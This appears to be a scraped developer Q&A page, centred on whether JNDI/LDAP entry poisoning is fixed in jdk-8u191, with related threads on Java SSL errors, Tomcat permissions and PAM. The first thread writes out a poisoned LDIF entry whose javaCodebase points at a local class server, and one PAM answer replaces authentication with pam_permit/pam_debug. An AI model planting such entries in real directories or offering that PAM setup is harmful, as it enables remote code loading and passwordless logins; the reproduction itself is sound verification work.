LDAP Entry Poisoning Fixed in jdk-8u191? - java

Fortify has reported an LDAP Entry Poisoning vulnerability in one of my Spring applications. You can get additional information on this vulnerability from the following links:
https://www.youtube.com/watch?v=Y8a5nB-vy78&feature=youtu.be&t=2111
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
I decided to try to prove for myself whether this was still a vulnerability. I did this using Spring Tool Suite:
file -> new -> import spring getting started content
searched for ldap
and imported the Authenticating Ldap -> complete code set
https://spring.io/guides/gs/authenticating-ldap/
I then added the following lines to the included test-server.ldif file, to both the entry for bob and the entry for developers:
javaFactory: PayloadObject
objectClass: javaNamingReference
javaCodebase: http://127.0.0.1:9999/
javaClassName: PayloadObject
In order to run this, I needed to add the following line to application.properties:
spring.ldap.embedded.validation.enabled=false
I started up Wireshark and ran the Spring sample app, and sure enough, when I logged in with bob, I got a hit in Wireshark on port 9999.
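(For anyone repeating the experiment: you don't strictly need Wireshark. A throwaway listener on the codebase port shows the class-fetch attempt just as well. Below is a minimal, illustrative sketch using the JDK's built-in com.sun.net.httpserver; the class name and behaviour are mine, not part of the Spring guide.)

import com.sun.net.httpserver.HttpServer;
import java.net.InetSocketAddress;

// Throwaway listener: logs any request the JNDI/LDAP client makes to the
// javaCodebase URL (http://127.0.0.1:9999/). On a vulnerable JDK you should
// see a GET for /PayloadObject.class when the poisoned entry is resolved.
public class CodebaseListener {
    public static void main(String[] args) throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress(9999), 0);
        server.createContext("/", exchange -> {
            System.out.println("Hit: " + exchange.getRequestMethod()
                    + " " + exchange.getRequestURI());
            exchange.sendResponseHeaders(404, -1); // we only care about the callback
            exchange.close();
        });
        server.start();
        System.out.println("Listening on 127.0.0.1:9999 ...");
    }
}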
When I asked a co-worker to test the same thing, he was unable to reproduce. After some research, we discovered that he had a newer jdk than I, and after I updated my jdk, I, too, was unable to reproduce the issue.
We narrowed it down to jdk-8u191 being the version that introduced "the fix", but I can't find anything in the Java release notes that explains why or how it was fixed.
My question is: is LDAP Entry Poisoning now a false positive if we're running jdk-8u191 or newer? Or is there some configuration option that can be set to override this "fix"?

8u191 closed a remote class loading vulnerability in LDAP, though research is ongoing. Whenever you are turning a stream of bytes into an Object in Java, you want to think about class loading (what 8u191 addressed), but also insecure deserialization.
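To make the deserialization half of that concrete: since 8u121 (and as a standard API from Java 9) the JDK supports process-wide serialization filters via the jdk.serialFilter property, which is the usual blanket mitigation when you cannot avoid ObjectInputStream. A minimal sketch with an illustrative allow-list pattern (the class names and pattern are mine, not from the talk):

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;

// Run with e.g.:
//   java "-Djdk.serialFilter=java.util.*;java.lang.*;!*" SerialFilterDemo
// The allow-list pattern rejects any class not explicitly listed, so a gadget
// chain smuggled in via LDAP (or any other channel) is refused before
// readObject() can reconstruct it.
public class SerialFilterDemo {
    public static void main(String[] args) throws Exception {
        ArrayList<String> payload = new ArrayList<String>();
        payload.add("harmless payload");

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(payload);
        }

        try (ObjectInputStream in = new ObjectInputStream(
                new ByteArrayInputStream(bytes.toByteArray()))) {
            // ArrayList and String pass the filter; anything outside the
            // allow-list would fail with an InvalidClassException.
            System.out.println(in.readObject());
        }
    }
}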
When CVEs are addressed, they are not typically in the release notes.
As for whether or not the alert from Fortify is a false positive, I think it is more important to assess the risk relative to your application.
To leverage this vulnerability, for example, the attacker would at least need direct access to your LDAP instance (see pg. 31), which likely indicates a larger security issue. On 8u191 and later, the attacker would additionally need to find a class on your classpath that is vulnerable to insecure deserialization in order to reproduce what the Black Hat talk demonstrates.
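On the configuration question: as far as I recall, the knob behind the 8u191 behaviour is the com.sun.jndi.ldap.object.trustURLCodebase system property, which newer builds treat as false unless you explicitly set it (the RMI counterpart was locked down back in 8u121). Treat the sketch below as a lab aid rather than gospel; re-enabling the property reopens the remote class loading hole and should never be done in production.

public class TrustUrlCodebaseCheck {
    public static void main(String[] args) {
        // The property is normally unset: 8u191+ treats "unset" as false
        // (remote codebases not trusted), while older 8u builds effectively
        // behaved as if it were true.
        System.out.println("com.sun.jndi.ldap.object.trustURLCodebase = "
                + System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase", "<unset>"));
        System.out.println("com.sun.jndi.rmi.object.trustURLCodebase  = "
                + System.getProperty("com.sun.jndi.rmi.object.trustURLCodebase", "<unset>"));

        // Re-enabling remote codebases (deliberately vulnerable, lab use only):
        // System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
    }
}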

Related

Getting SSL error when trying to hit a REST webservice (GET call)?

My team is facing an SSLException when we try to hit a REST-based webservice. We are adding all the headers required to call the webservice.
Right now we have a temporary solution to the problem: we copied the security file from the Java 8 folder into the Java 7 folder.
There is one more socket-based solution our team tried, but I don't know it in a larger context, and it was also rejected by higher authorities.
We found that the webservice is based on Java 5, and some of the security certificates it needs were not available in Java 7, which is why we were getting the error. The first solution works for the testing phase, but it's not good for production.
The actual error we are facing is:
javax.net.ssl.SSLException: java.lang.RuntimeException: Could not generate DH keypair
During our research we found this question too and tried every solution given for it.
So, has anyone faced a similar issue before and can provide us with a solution, so that we can hit the webservice and add those certificates dynamically at runtime?
Please post the SSL debug logs?
I had this problem once, and the reason was that the remote REST service only supported TLSv1.2 while we were on TLSv1.1.
We called the REST service by specifying the required TLS protocol version via System.setProperty().
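For reference, the System.setProperty() approach usually means the https.protocols JSSE property, which HttpsURLConnection honours for outbound handshakes. A rough sketch (the URL is a placeholder and TLSv1.2 is only an example; use whatever the server actually accepts):

import java.net.URL;
import javax.net.ssl.HttpsURLConnection;

public class ForceTlsVersion {
    public static void main(String[] args) throws Exception {
        // Restrict the protocols HttpsURLConnection will offer in the handshake.
        // Must be set before the first HTTPS connection is made.
        System.setProperty("https.protocols", "TLSv1.2");

        HttpsURLConnection conn = (HttpsURLConnection)
                new URL("https://example.com/").openConnection(); // placeholder URL
        System.out.println("HTTP status: " + conn.getResponseCode());
        conn.disconnect();
    }
}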
The problem was with the Java version. The security files needed to hit the REST service were not present in Java 1.7.51 (our Java version at the time). So instead of changing the security files, we upgraded Java from 1.7.51 to 1.7.80, which contains those security files. No compatibility was broken and the issue was fixed without a workaround.
We got the idea for this solution from this StackOverflow question.

Which permission to set to avoid an error with the Security Manager on HTTPS URLs?

In software for a customer, we have to read given URLs to parse their content. The customer also needs to activate the Tomcat Security Manager so that Java policies control what the program does.
Now, when reading URLs, the exception "javax.net.ssl.SSLKeyException: RSA premaster secret error" occurs, but only under certain conditions:
if the URL is HTTPS, not HTTP
if the Security Manager is activated; it does not occur when the Security Manager is deactivated, nor when AllPermission is set in a global grant block
only with Java 6, not with Java 7 (the customer needs Java 6 currently)
only with Tomcat6, not with Tomcat 7 (the customer needs Tomcat 6 currently)
The security violation happens somewhere in Java code; an AllPermission restricted to our codebase doesn't prevent the error.
So, does someone have an idea which permission to set for Java 6 so that it can process HTTPS?
Other information: it's running inside Tomcat, on Debian Linux with OpenJDK.
EDIT: I added the Java parameter "-Djava.security.debug=access,failure" to the JAVA_OPTS variable in Tomcat's /etc/default/tomcat6, but there are no additional messages in the logs. Might it be that the code checks the permissions before actually exercising them?
EDIT2: I found the correct place and got the full stacktrace (removed specific customer parts):
javax.net.ssl.SSLKeyException: RSA premaster secret error
at [...]
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at javax.security.auth.Subject.doAsPrivileged(Subject.java:537)
at java.lang.Thread.run(Thread.java:701)
Caused by: java.security.NoSuchAlgorithmException: SunTlsRsaPremasterSecret KeyGenerator not available
at javax.crypto.KeyGenerator.<init>(KeyGenerator.java:141)
at javax.crypto.KeyGenerator.getInstance(KeyGenerator.java:191)
... 14 more
EDIT3: So far I had assumed that the Java URL class was used to access the contents of the resource, but that is not the case. The Grails code uses Groovy's URL extension with the getText() method:
new URL(params.url).text
The error happens on this line. It's Grails version 2.2.4.
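For anyone unfamiliar with the Groovy shorthand, new URL(params.url).text boils down to roughly the plain-Java read below, which is why the failure surfaces deep inside JSSE rather than in Grails code. This is only an approximation of what Groovy does (it handles charsets and connection details differently), and the URL in main() is a placeholder:

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class UrlText {
    // Approximate equivalent of Groovy's URL.getText(): open the connection
    // (which triggers the TLS handshake for https URLs) and read the body.
    static String text(String url) throws Exception {
        StringBuilder sb = new StringBuilder();
        try (BufferedReader in = new BufferedReader(new InputStreamReader(
                new URL(url).openStream(), StandardCharsets.UTF_8))) {
            String line;
            while ((line = in.readLine()) != null) {
                sb.append(line).append('\n');
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(text("https://example.com/")); // placeholder URL
    }
}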
Solution following several comments and OP confirmation of resolution (summary)
The root cause is the presence of sunjce_provider.jar in multiple locations. This was discovered by the OP after it was suggested as one of a number of possible root causes (see the very end of this answer and the comment trail). As per OP's comment:
I have the sunjce_provider.jar in multiple directories. I tried to give all three locations for Java 6 the rights, although clearly only one is JAVA_HOME - and it worked. Somehow one of the other locations is used, although it isn't in the java.ext.dirs-property
Therefore the resolution in this case was to ensure that the app had rights to access the correct copy of sunjce_provider.jar.
I've left the main points from my original answer, and the comments that helped with diagnosis, below for anyone who finds this later.
Original answer and comments that led to solution
This will not happen with HTTP because your web app (which is the client for this connection, even though it's running in Tomcat) does not need to generate a key in that configuration.
The fact that it only occurs when the SecurityManager is enabled, but not when it is disabled or with a global AllPermission, suggests it's a file permission error. It also suggests that it is not a problem with the key length (e.g. the one mentioned here).
Other similar reports on the web indicate that the likely root cause is a missing jar (usually sunjce_provider.jar is cited). The stack trace confirms that the root cause exception is a NoSuchAlgorithmException where the KeyGenerator is looking for algorithm SunTlsRsaPremasterSecret and can't find it. In your case, as this only occurs with a particular SecurityManager configuration, it could be an inaccessible jar (due to security permissions).
My guess would be that you have not granted codeBase permissions for the correct directory containing the jar needed for your RSA keygen algorithm. My suggested course of action would be to go through your webapp and JRE directory structure to find where the runtime jars are kept and ensure that they have permissions granted in catalina.policy.
In the default configuration - for instance - you should see somewhere
// These permissions apply to all shared system extensions
grant codeBase "file:${java.home}/jre/lib/ext/-" {
permission java.security.AllPermission;
};
For details of what this means exactly see this section of the tomcat security manager "How To". You need to check a few things - make sure that ${java.home}/jre/lib/ext/ is where your runtime jars are. If not - alter the path to point to the right place (it is where they are on my version of OpenJDK 6 - build 27). In particular you should see sunjce_provider.jar and sunpkcs11.jar in there. Make sure the above section exists in your policy file.
It may be that the code is depending on some jars that are within your webapp - e.g. in ${catalina.base}/path/to/your/webapp/WEB-INF/classes/ - in which case you need to grant permissions to that directory.
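Something along these lines in catalina.policy would cover that case; it simply mirrors the shape of the default block above, and the paths reuse the placeholder from the previous sentence, so substitute your real webapp location (and consider narrower permissions than AllPermission once things work):

// Placeholder paths -- point these at your actual webapp's classes and jars
grant codeBase "file:${catalina.base}/path/to/your/webapp/WEB-INF/classes/-" {
permission java.security.AllPermission;
};
grant codeBase "file:${catalina.base}/path/to/your/webapp/WEB-INF/lib/-" {
permission java.security.AllPermission;
};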
Other problems that cause same or similar symptoms
The app being unable to find or access sunpkcs11.jar will give the same error message (verified on an Ubuntu + OpenJDK 6 + Tomcat 6 system). It is likely that duplicate copies of that jar will, too.
Check /etc/java-6-openjdk/security/java.security. It should list the providers; check that there's a line something like security.provider.n = sun.security.pkcs11.SunPKCS11. If that line is missing you also get this error (verified on the same system). See the diagnostic sketch just after this list.
This Debian bug report talks about problems with the location of jars when running under a SecurityManager
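A quick way to narrow down which of the above applies is to ask the JVM directly which providers it can see and whether the exact algorithm from the stack trace resolves. This is only a diagnostic sketch; to reproduce the permission-related failure it would need to run inside the same Tomcat/SecurityManager setup:

import java.security.Provider;
import java.security.Security;
import javax.crypto.KeyGenerator;

public class ProviderCheck {
    public static void main(String[] args) {
        // List every registered security provider (should include SunJCE and SunPKCS11).
        for (Provider p : Security.getProviders()) {
            System.out.println(p.getName() + " " + p.getVersion());
        }
        try {
            // The same lookup that fails in the stack trace above.
            KeyGenerator.getInstance("SunTlsRsaPremasterSecret");
            System.out.println("SunTlsRsaPremasterSecret KeyGenerator: available");
        } catch (Exception e) {
            System.out.println("SunTlsRsaPremasterSecret KeyGenerator: " + e);
        }
    }
}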
Debugging comment
As per the other answer, you might try adding -Djava.security.debug=access,failure to CATALINA_OPTS or JAVA_OPTS in your catalina.sh to enable debugging, which should log to catalina.out by default (or wherever you have pointed your logging via CATALINA_OUT in catalina.sh). You should see output from the SecurityManager there.
You can also try -Djava.security.debug=all. You will get a huge catalina.out, but you can grep for words that might help (like "fail").
Follow the code from the stack trace
Your exception is being thrown here. Looking at how that exception could be thrown, this method must return null. It swallows exceptions, which isn't nice and makes it hard to diagnose exactly which part of that code is failing. My money would be on this line, where canUseProvider() might return false. This all points back to the provider jar being inaccessible for some reason.
I'm assuming you didn't see any access violations in the output, even with -Djava.security.debug=access,failure. You could try -Djava.security.debug=all, although that may well simply produce more irrelevant logging. If there is no access violation, you may somehow have two versions of that jar on your classpath and the runtime is accessing (or trying to access) the wrong one. A similar case is described in this Q/A.
The easy way to discover all required permissions is to run with the argument
-Djava.security.debug=access,failure
You will then be given complete information on every failed security access, the protection domain that was in force, etc.

Cryptix setup with java-bridge on Ubuntu is throwing an "algorithm not found" error

I am trying to set up a payment gateway, for which I have set up a Java bridge, since the portal is a Java machine. My setup is the following:
Apache server
Tomcat 7
Java 6 OpenJDK
The following is the error from catalina.out:
<PostLib><postSSL><Exception in encrypting data. algorithm DES/ECB is not available from provider Cryptix>
<PostLib><postSSL><SFAApplicationException. Error while encrypting data. Transaction cannot be processed.>
I have placed cryptix32.jar in Tomcat's shared folder. Adding or removing the Cryptix provider line from java.security also has no effect.
Can anyone please tell me what needs to be done to get rid of this error?
So you are trying to set up a payment portal using DES and Cryptix? Then you are proposing to use Apache - probably with OpenSSL - as a proxy. A proxy to a Java version that is basically end of life. And you are using one without commercial support.
"DES/ECB" is part of the standard SunJCE provider as well. No need for Cryptix there.
Please stop resurrecting the dead and go do something else.

PAM "pam_unix.so" authentication sometimes fails

I'm having some trouble with PAM. I have a tomcat webapp that uses PAM to authenticate. During install we make a symbolic link in /etc/pam.d to the /etc/pam.d/sshd file. This has always worked.
Recently I added a way for users to authenticate each request (rather than using a JSESSIONID cookie). This was added because we need to batch load some data into a monitoring application periodically and using Basic Auth was easy.
If I curl my webservice repeatedly (like 10 times a second), then every once in a while PAM will fail. This happens around once every 500 times, though my client claims it happens once every couple of times (note that they are running remotely, though I don't see why that matters).
I have replaced my sym-linked pam config with a minimal config of:
#%PAM-1.0
auth sufficient pam_unix.so audit
auth required pam_deny.so
I have also added this to my /etc/syslog.conf
*.debug /var/log/debug.log
The only applicable log messages can be found in the debug.log:
Mar 12 09:49:32 arques java: pam_unix(foo:auth): unable to obtain a password
Mar 12 09:49:32 arques java: pam_unix(foo:auth): auth could not identify password for [root]
How do I debug this further? I have tried:
Using different hosts, one of which is a brand-new install
Turning off the nscd service
I'm having a similar problem with a Java application that uses PAM for authentication. For now, I'm guessing the problem is within the distributed Java PAM binding implementation on CentOS 6.4. I no longer have access to that system (but I'm still trying to solve this problem) so I cannot provide specifics such as JDK version, etc.
My solution ultimately was to harshly kludge PAM:
#%PAM-1.0
auth sufficient pam_debug.so
To make this more explicit, you could use "pam_permit.so" instead.
That's it, basically. Any valid user would then be authenticated, with or without password. Ugh.
I'm continuing to research better answers.

CFHTTP: find out supported version of SSL & test auth.net with SSL 3.0

I recently received an email from Authorize.net saying:
During the week of March 16-20, 2009, Authorize.Net will be deprecating all legacy support for the SSL 2.0 protocol. Changes have recently been made to the Payment Card Industry Data Security Standard (PCI DSS) which have made the use of SSL 2.0 a PCI DSS violation.
So the question is: how do I make sure that my ColdFusion apps, which use cfhttp to communicate with the auth.net service, won't break in March?
I'm trying to find out which versions of SSL are supported, but I can't find that info.
Any suggestions?
EDIT
Found discussions: one & two. It seems that the only reliable way is upgrading to CF8.
So, another question now: how do I test my code against the new auth.net protocol? Is there any way to switch the dev environment before going live?
I've also sent an email to auth.net dev support with these questions. If they provide a solution, I will post it here.
Here is a nice article on www.talkingtree.com regarding the matter:
ColdFusion Protocol Tags CFHTTP, CFINVOKE, CFLDAP support SSLv2
It looks like CF8 is the first version to support SSLv3.
You can also get your hands really dirty and make SSLv3 requests directly, using Java. This would of course require changing working code to emulate functionality that would come naturally with CF8. But if upgrading is not an option for you, maybe this is a viable alternative.
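As a rough illustration of the "directly, using Java" route: build an SSLContext for the protocol version you need and hand its socket factory to the connection. SSLv3 is disabled in current JDKs, so the protocol string below is purely illustrative of the mechanism, and the URL is the Authorize.net test endpoint mentioned later in this thread:

import java.net.URL;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;

public class ExplicitProtocolRequest {
    public static void main(String[] args) throws Exception {
        // Build an SSLContext for a specific protocol version and hand its
        // socket factory to the connection. "TLSv1.2" stands in for whatever
        // the gateway actually requires.
        SSLContext ctx = SSLContext.getInstance("TLSv1.2");
        ctx.init(null, null, null); // default key and trust managers

        HttpsURLConnection conn = (HttpsURLConnection)
                new URL("https://test.authorize.net/").openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        System.out.println("HTTP status: " + conn.getResponseCode());
    }
}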
I can't say much about how to test your code against Authorize.net, I'm afraid.
Okay, finally The Gods Have Spoken -- Auth.net Developer replied:
We would recommend that each user verify their server SSL encryption protocol settings. If you are unsure where to find them, a Google search of the server type along with SSL 3.0 should provide helpful information in this regard. Additionally, the server support resources should provide this information.
This change has been released to the test environment. You may use the following shared test account for testing purposes if you wish:
Login ID: xxxxxxxx
Password: xxxxxxxxx
Login URL: https://test.authorize.net
API Login ID: xxxxxxxx
Transaction Key: xxxxxxxxx
Post to URL: https://test.authorize.net/gateway/transact.dll
Note: this is a new test account, but I think all test accounts have been changed now; I will try to test.
At least now I am able to test my transactions in the sandbox before the changes go live, which is what I wanted.
